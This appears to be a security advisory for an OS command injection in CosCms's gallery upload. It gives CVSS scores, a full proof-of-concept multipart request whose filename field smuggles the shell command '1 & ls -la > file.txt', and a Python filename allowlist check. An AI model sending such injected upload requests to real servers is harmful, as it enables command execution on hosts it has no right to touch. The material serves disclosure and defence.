CVSS2: 8.5 High
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: SINGLE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:M/Au:S/C:C/I:C/A:C
EPSS: 0.029 Low
EPSS Percentile: 89.7%
High-Tech Bridge Security Research Lab discovered a vulnerability in CosCms that can be exploited to execute arbitrary OS commands on the web server where the vulnerable application is hosted.
POST /gallery/upload/index HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------21456260222104
Content-Length: 970

-----------------------------21456260222104
Content-Disposition: form-data; name="title"

1
-----------------------------21456260222104
Content-Disposition: form-data; name="image_add"

1
-----------------------------21456260222104
Content-Disposition: form-data; name="description"

1
-----------------------------21456260222104
Content-Disposition: form-data; name="tags"


-----------------------------21456260222104
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000000
-----------------------------21456260222104
Content-Disposition: form-data; name="APC_UPLOAD_PROGRESS"

511ad0922b50f
-----------------------------21456260222104
Content-Disposition: form-data; name="file"; filename="1 & ls -la > file.txt"
Content-Type: application/octet-stream

1
-----------------------------21456260222104
Content-Disposition: form-data; name="submit"

Update
-----------------------------21456260222104--
Successful exploitation of this vulnerability requires an attacker to be logged in and to have privileges to upload files. User registration is disabled by default.
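The request above carries shell metacharacters in the `filename` parameter of the `file` part. As an added example (not CosCms code and not part of the original advisory), the Python sketch below shows a server-side check that rejects such names and stores uploads under a server-generated name, so the client-supplied string never reaches a command line. The allowlist pattern, the extension set, and all function names are assumptions, and the sample body is constructed from two parts of the request shown on this page.

```python
import re
import secrets
from email import message_from_bytes

# Assumed policy: plain names only, and only image extensions for a gallery.
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9._-]{0,99}")
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

def upload_filenames(content_type, body):
    """Return every filename= value carried in a multipart/form-data body."""
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    names = []
    for part in message_from_bytes(raw).walk():
        if not part.is_multipart() and part.get_filename() is not None:
            names.append(part.get_filename())
    return names

def rejected_filenames(content_type, body):
    """Names that fail the allowlist, e.g. ones with spaces, '&' or '>'."""
    return [n for n in upload_filenames(content_type, body)
            if not SAFE_NAME.fullmatch(n)]

def storage_name(client_name):
    """Server-generated name; only an allowlisted extension is kept."""
    ext = client_name.rsplit(".", 1)[-1].lower() if "." in client_name else ""
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed: %r" % ext)
    return secrets.token_hex(16) + "." + ext

# Constructed sample: two parts taken from the request shown on this page.
BOUNDARY = "-" * 27 + "21456260222104"
SAMPLE_CT = "multipart/form-data; boundary=" + BOUNDARY
SAMPLE_BODY = "\r\n".join([
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="title"',
    "",
    "1",
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="file"; filename="1 & ls -la > file.txt"',
    "Content-Type: application/octet-stream",
    "",
    "1",
    "--" + BOUNDARY + "--",
    "",
]).encode("ascii")

if __name__ == "__main__":
    print(rejected_filenames(SAMPLE_CT, SAMPLE_BODY))
    print(storage_name("holiday_01.JPG"))
```

The same allowlist can be applied in request logs or at a reverse proxy to flag upload attempts whose `filename` contains characters outside the pattern.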